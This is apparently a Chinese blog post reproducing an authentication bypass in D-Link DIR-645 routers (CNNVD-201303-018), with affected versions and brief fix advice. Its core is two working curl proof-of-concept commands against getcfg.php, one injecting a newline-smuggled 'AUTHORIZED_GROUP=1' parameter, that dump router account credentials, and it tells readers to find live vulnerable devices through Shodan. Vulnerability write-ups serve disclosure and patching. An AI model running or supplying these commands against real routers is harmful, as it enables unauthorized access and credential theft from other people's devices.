【CNNVD-201303-018】D-Link DIR-645 Routers 认证绕过漏洞复现

目录

  • 0x00 漏洞概述
  • 0x01 影响版本
  • 0x02 漏洞评级
  • 0x03 shodan搜索漏洞环境
  • 0x04 漏洞验证
  • 0x05 修复建议

0x00 漏洞概述

友讯科技股份有限公司(D-Link Corporation)是一家台湾科技公司,总部位于台北市内湖区,于1986年由高次轩成立。公司专注于电脑网络设备的设计开发,自创“D-Link”品牌,主要生产制造消费者及企业所使用的无线网络和以太网硬件产品。

D-Link DIR-645是一款无线路由器。D-Link DIR-645路由器1.03之前的版本(不包含1.03)中存在远程认证绕过漏洞。远程攻击者利用该漏洞绕过身份验证机制进而获得未授权访问权限。在1.03 ~ 1.06版本中,虽然有权限的检查,但是由于cgibin程序中代码逻辑出现了问题,导致可绕过校验,实现泄露。

0x01 影响版本

DIR-645 < 1.03
1.03 ≤ DIR-645 ≤ 1.06

0x02 漏洞评级

高危

0x03 shodan搜索漏洞环境

本文以1.02和1.04版本为例子进行漏洞复现
使用shodan搜索"DIR-645"。
【CNNVD-201303-018】D-Link DIR-645 Routers 认证绕过漏洞复现_第1张图片
找到对应版本的漏洞环境。
【CNNVD-201303-018】D-Link DIR-645 Routers 认证绕过漏洞复现_第2张图片
【CNNVD-201303-018】D-Link DIR-645 Routers 认证绕过漏洞复现_第3张图片

0x04 漏洞验证

针对1.03之前版本(不包含1.03)的POC代码如下:

curl -d "SERVICES=DEVICE.ACCOUNT" "http://xx.xx.xx.xx/getcfg.php"

执行后可以成功获取到账号密码。
【CNNVD-201303-018】D-Link DIR-645 Routers 认证绕过漏洞复现_第4张图片
针对在1.03之后1.06之前版本(包含1.06)的POC代码如下:

curl -d "SERVICES=DEVICE.ACCOUNT&attack=ture%0aAUTHORIZED_GROUP=1" "http://xx.xx.xx.xx/getcfg.php"

执行后同样可以成功获取到账号密码。
【CNNVD-201303-018】D-Link DIR-645 Routers 认证绕过漏洞复现_第5张图片

0x05 修复建议

1、访问限制白名单
2、升级最新产品

你可能感兴趣的:(漏洞复现)